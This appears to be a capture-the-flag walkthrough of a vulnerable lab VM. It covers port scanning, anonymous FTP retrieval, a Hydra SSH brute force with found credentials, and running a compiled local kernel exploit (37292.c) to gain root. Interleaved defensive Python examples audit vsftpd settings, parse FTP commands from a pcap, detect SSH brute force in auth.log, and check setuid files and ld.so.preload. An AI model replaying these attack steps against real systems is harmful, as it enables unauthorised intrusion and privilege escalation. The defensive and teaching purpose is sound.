```
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.3.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 04:55 EST
Nmap scan report for 192.168.3.28
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.3.11
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/secret
MAC Address: 00:0C:29:39:E9:62 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.3.28

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.44 seconds
```
```
┌──(root㉿kali)-[~]
└─# ftp 192.168.3.28
Connected to 192.168.3.28.
220 (vsFTPd 3.0.2)
Name (192.168.3.28:root): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33509|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||64258|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |******************************************************************************************************************|  8068        8.89 MiB/s    00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (4.98 MiB/s)
ftp>
```
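The nmap output above reports three things a defender would want to fix on the FTP service: anonymous login is allowed, the anonymous directory is writeable (`[NSE: writeable]`, and `lol.pcap` is mode 777), and the control and data channels are plain text. The following is an added example, not code from the writeup or from vsftpd: it parses a `vsftpd.conf` and reports which of those conditions the configuration produces. The directive names are real vsftpd options and the defaults are vsftpd's own built-in defaults; the two configuration texts are constructed samples, one resembling the target and one hardened.

```python
# Added example: audit a vsftpd.conf for the settings behind the nmap findings.
# Directive names are real vsftpd options; the sample configs are constructed.

# vsftpd's built-in defaults for the directives checked here
# (a directive absent from the file takes its default).
VSFTPD_DEFAULTS = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "anon_other_write_enable": "NO",
    "ssl_enable": "NO",
}

# Any of these, together with write_enable=YES, lets anonymous users change files.
ANON_WRITE_KEYS = ("anon_upload_enable", "anon_mkdir_write_enable", "anon_other_write_enable")


def parse_vsftpd_conf(text):
    """Parse key=value lines; '#' comments and blank lines are ignored."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip().upper()
    return conf


def audit_vsftpd(text):
    """Return a list of findings; an empty list means none of the checks fired."""
    conf = {**VSFTPD_DEFAULTS, **parse_vsftpd_conf(text)}
    findings = []
    if conf["anonymous_enable"] == "YES":
        findings.append("anonymous login allowed (nmap ftp-anon would report FTP code 230)")
        if conf["write_enable"] == "YES":
            enabled = [k for k in ANON_WRITE_KEYS if conf[k] == "YES"]
            if enabled:
                findings.append("anonymous users can write: " + ", ".join(enabled))
    if conf["ssl_enable"] == "NO":
        findings.append("control and data connections are plain text (ssl_enable=NO)")
    return findings


WEAK_CONF = """\
# constructed sample that reproduces what the scan observed
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_other_write_enable=YES
"""

HARDENED_CONF = """\
# constructed sample: no anonymous access, writes only for local users, TLS on
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for finding in audit_vsftpd(conf) or ["no findings"]:
            print("  -", finding)
```

The audit merges the file over vsftpd's defaults before checking, because the dangerous case for `anonymous_enable` is the directive being absent: vsftpd itself defaults it to YES, so a config that never mentions it is still open.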
Analyze the traffic.
A request in the capture downloaded a file named secret_stuff.txt:
```
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
```
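The traffic analysis step above boils down to reading the FTP control channel out of the capture: which user logged in and which file was requested with `RETR`. The block below is an added example and not the writeup's own tooling: it builds a small constructed pcap (not the real `lol.pcap`) with an anonymous login, one unrelated HTTP packet, and a `RETR secret_stuff.txt`, then parses the pcap, Ethernet, IPv4 and TCP headers with only the standard library and lists the control-channel lines. The IP addresses are the ones from the scan above; MAC addresses, checksums, ports, timestamps and the anonymous password are constructed.

```python
import struct

# ---- constructed sample capture (not the lol.pcap from the target) ----
CLIENT, SERVER = "192.168.3.11", "192.168.3.28"


def _frame(src_ip, dst_ip, sport, dport, payload):
    """Ethernet + IPv4 + TCP with zeroed MACs and checksums (the parser never verifies them)."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # ethertype IPv4
    ip_total = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_total, 0, 0, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Little-endian pcap, link type 1 (Ethernet); timestamps are constructed."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1407542400 + i, 0, len(f), len(f)) + f
    return out


SAMPLE_PCAP = build_pcap([
    _frame(CLIENT, SERVER, 40001, 21, b"USER anonymous\r\n"),
    _frame(SERVER, CLIENT, 21, 40001, b"331 Please specify the password.\r\n"),
    _frame(CLIENT, SERVER, 40001, 21, b"PASS a@b.c\r\n"),
    _frame(SERVER, CLIENT, 21, 40001, b"230 Login successful.\r\n"),
    _frame(CLIENT, SERVER, 40002, 80, b"GET /secret HTTP/1.0\r\n\r\n"),   # noise, not FTP
    _frame(CLIENT, SERVER, 40001, 21, b"RETR secret_stuff.txt\r\n"),
    _frame(SERVER, CLIENT, 21, 40001,
           b"150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).\r\n"),
])


def ftp_control_messages(pcap):
    """Return (direction, src, dst, line) for every line carried on an FTP control channel."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", pcap[:24])
    if magic != 0xA1B2C3D4 or linktype != 1:
        raise ValueError("expected a little-endian Ethernet pcap")
    off, messages = 24, []
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack("<IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:                                         # not TCP
            continue
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]                    # skip TCP header + options
        if 21 not in (sport, dport) or not payload:
            continue
        direction = "C>S" if dport == 21 else "S>C"
        for line in payload.decode("ascii", "replace").splitlines():
            if line:
                messages.append((direction, src, dst, line))
    return messages


def files_retrieved(pcap):
    """Filenames the client requested with RETR, in capture order."""
    return [line.split(" ", 1)[1] for d, _, _, line in ftp_control_messages(pcap)
            if d == "C>S" and line.upper().startswith("RETR ")]


if __name__ == "__main__":
    for direction, src, dst, line in ftp_control_messages(SAMPLE_PCAP):
        print(f"{direction} {src} -> {dst}: {line}")
    print("retrieved:", files_retrieved(SAMPLE_PCAP))
```

One caveat for real captures: this splits lines per TCP segment and does no stream reassembly, so a command straddling two segments would be missed; for a small capture like the one on the target that is rarely an issue, but a production parser should reassemble the stream first.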
```
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
```
```
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
```
Pass.txt
```
Good_job_:)
```
With the usernames and the password in hand, I went straight to brute-forcing SSH with Hydra.
```
┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -L user.txt -p Pass.txt ssh://192.168.3.28
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-06 05:18:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:10/p:1), ~1 try per task
[DATA] attacking ssh://192.168.3.28:22/
[22][ssh] host: 192.168.3.28   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-06 05:18:52
```
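Seen from the server, the Hydra run above is ten logins with one password inside three seconds from a single source, followed by one accepted login. That pattern (many distinct usernames, one source, short window, then success) is what `sshd` writes to `auth.log`, and it is easy to alert on. The block below is an added example, not part of the writeup: it parses constructed `auth.log` lines modelled on this run (hostname `troll` from the `uname` output later in the writeup; PIDs, ports, the second source address and the year are constructed) and flags both the failure burst and the login accepted after it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log sample (not from the target): nine failures from one source in
# four seconds, one Accepted right after, and a benign typo-then-success from another host.
SAMPLE_AUTH_LOG = """\
Nov  6 05:18:49 troll sshd[2001]: Failed password for invalid user maleus from 192.168.3.11 port 40120 ssh2
Nov  6 05:18:49 troll sshd[2002]: Failed password for invalid user ps-aux from 192.168.3.11 port 40121 ssh2
Nov  6 05:18:50 troll sshd[2003]: Failed password for invalid user felux from 192.168.3.11 port 40122 ssh2
Nov  6 05:18:50 troll sshd[2004]: Failed password for invalid user Eagle11 from 192.168.3.11 port 40123 ssh2
Nov  6 05:18:50 troll sshd[2005]: Failed password for invalid user genphlux from 192.168.3.11 port 40124 ssh2
Nov  6 05:18:51 troll sshd[2006]: Failed password for invalid user usmc8892 from 192.168.3.11 port 40125 ssh2
Nov  6 05:18:51 troll sshd[2007]: Failed password for invalid user blawrg from 192.168.3.11 port 40126 ssh2
Nov  6 05:18:51 troll sshd[2008]: Failed password for invalid user wytshadow from 192.168.3.11 port 40127 ssh2
Nov  6 05:18:52 troll sshd[2009]: Failed password for invalid user vis1t0r from 192.168.3.11 port 40128 ssh2
Nov  6 05:18:52 troll sshd[2010]: Accepted password for overflow from 192.168.3.11 port 40129 ssh2
Nov  6 06:40:02 troll sshd[2100]: Failed password for overflow from 192.168.3.50 port 50001 ssh2
Nov  6 06:41:10 troll sshd[2101]: Accepted password for overflow from 192.168.3.50 port 50002 ssh2
""".splitlines()

AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_auth_log(lines, year=2024):
    """Syslog timestamps carry no year, so the caller supplies it (assumption for the sample)."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return events


def detect_ssh_attacks(lines, threshold=5, window_s=60, year=2024):
    """Alert per source IP on >= threshold failures inside window_s, and on any login
    accepted from that source at or after the start of the burst."""
    by_ip = defaultdict(list)
    for ev in parse_auth_log(lines, year):
        by_ip[ev["ip"]].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "Failed"]
        burst, start = None, 0
        for end in range(len(fails)):               # sliding window over this source's failures
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                burst = fails[start:end + 1]
        if burst is None:
            continue
        users = sorted({e["user"] for e in burst})
        kind = "many users from one source (spray-like)" if len(users) > 1 else "one user hammered"
        alerts.append({"ip": ip, "kind": kind, "failures": len(burst), "users": users})
        for e in evs:
            if e["result"] == "Accepted" and e["ts"] >= burst[0]["ts"]:
                alerts.append({"ip": ip, "kind": "login accepted after failure burst",
                               "user": e["user"], "at": e["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_attacks(SAMPLE_AUTH_LOG):
        print(alert)
```

The "accepted after burst" alert is the one worth paging on: a burst alone is background noise on any exposed SSH port, while a success from the same source right after one means the credential is valid and the account needs to be reset. The second host in the sample shows why the threshold matters: one mistyped password followed by a success is normal user behaviour and produces no alert.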
```
┌──(root㉿kali)-[~/yiyi/tmp]
└─# ssh overflow@192.168.3.28
overflow@192.168.3.28's password:
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Nov  6 02:20:04 2024 from 192.168.3.11
Could not chdir to home directory /home/overflow: No such file or directory
$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/su
/bin/ping
/bin/fusermount
/bin/ping6
/bin/mount
/bin/umount
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$
```
```
$ ls
37292.c
$ gcc 37292.c -o exp
$ ./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!
```
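Two host-side indicators come straight out of the session above: the attacker's own first step was to enumerate setuid binaries, and the exploit run itself reports `/etc/ld.so.preload created`, a file that does not exist on a healthy system and that any later process will honour. The block below is an added example, not part of the writeup: it walks a filesystem root for setuid files, diffs them against a baseline, and reports the contents of `etc/ld.so.preload`. The baseline is an assumption built from the `find / -perm -u=s` output in the writeup, not a vetted list for Ubuntu 14.04, and `build_demo_root()` creates a constructed directory tree so the check can run without root on any machine.

```python
import os
import stat
import tempfile

# Assumed baseline taken from the writeup's own `find` output (not a vetted list);
# on a real deployment derive it from a clean image of the same build.
BASELINE_SUID = {
    "/usr/sbin/uuidd", "/usr/sbin/pppd", "/usr/bin/chfn", "/usr/bin/sudo", "/usr/bin/passwd",
    "/usr/bin/traceroute6.iputils", "/usr/bin/mtr", "/usr/bin/chsh", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/lib/pt_chown", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/bin/su", "/bin/ping", "/bin/fusermount", "/bin/ping6", "/bin/mount", "/bin/umount",
}


def suid_files(root="/"):
    """Paths (relative to root, written as absolute) of regular files with the setuid bit set."""
    found = set()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks while auditing
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add("/" + os.path.relpath(path, root).replace(os.sep, "/"))
    return found


def unexpected_suid(root="/", baseline=BASELINE_SUID):
    """Setuid files outside the baseline; a new one appearing after a login is the case to chase."""
    return sorted(suid_files(root) - baseline)


def ld_so_preload_entries(root="/"):
    """Non-empty lines of etc/ld.so.preload under root; the file normally does not exist at all."""
    path = os.path.join(root, "etc", "ld.so.preload")
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.strip() for line in fh if line.strip()]


def build_demo_root():
    """Constructed filesystem snapshot: one baseline setuid binary, one stray setuid file
    in /tmp, an ordinary binary, and a one-line ld.so.preload (every path is made up)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for rel, mode, content in (
        ("bin/su", 0o4755, b"#!/bin/sh\n"),
        ("tmp/rootshell", 0o4755, b"#!/bin/sh\n"),
        ("usr/bin/id", 0o755, b"#!/bin/sh\n"),             # must not be reported
        ("etc/ld.so.preload", 0o644, b"/tmp/constructed.so\n"),
    ):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo = build_demo_root()
    print("unexpected setuid files:", unexpected_suid(demo))
    print("ld.so.preload entries:", ld_so_preload_entries(demo))
```

Run against `/` on a suspect host, the two return values are a quick triage: an empty `unexpected_suid()` and an empty `ld_so_preload_entries()` rule out the two simplest persistence leftovers of the kind of root-level run shown above, while anything returned points at the file to preserve and examine before the box is rebuilt.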